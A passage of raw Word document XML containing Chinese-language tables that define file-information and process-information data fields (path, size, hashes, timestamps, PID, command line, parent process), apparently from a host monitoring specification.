          <w:p w14:paraId="7C0B97C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EDCD35A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2FA51D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41DE2001" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017E915F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9B962B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70060517" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A50015" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D00FE0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A1ED2BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B86DE2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D11607A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31FE2BA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EDD9FDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174B3808" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB154DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="400CEE27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EAEF905" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59940058" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDE0D68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB515A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="739E48B1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B192E60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>changeTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2014FB68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FFD9926" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EE934E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60054243" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A57ADE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B75DA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05905DE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6F5464" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D54A3A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44CBFE8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F12483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E12A5C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6DDA18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40F82E84" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2317552D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="512B5D76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07AD67F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="227A1805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="640E5A6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1D485C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6DB30F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7B24C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383F00CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AAD30DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AF7937" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07C9EB41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6852DFE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6458BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61385ED5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>进程信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2143"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="25E4499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A9AF568" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C5836E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754FD4F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12AA2F46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21990FAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41E86320" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2F95B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B8F9E8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC20727" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60B6C975" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FB35A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B45AD98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2171F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1DF116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程对应执行文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C3CDDF2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F5B7FFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544A2217" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0ABEFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="264E1308" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="235DD30F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661B3DB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1A92A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C790B54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB45640" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="000B6465" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617698F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmdline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD68C74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD70060" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35365298" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18411B52" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50171BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcessName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218BDE63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDF367D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="473A0791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E246F73" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C1E3DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentPid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4F95A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212C6DD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
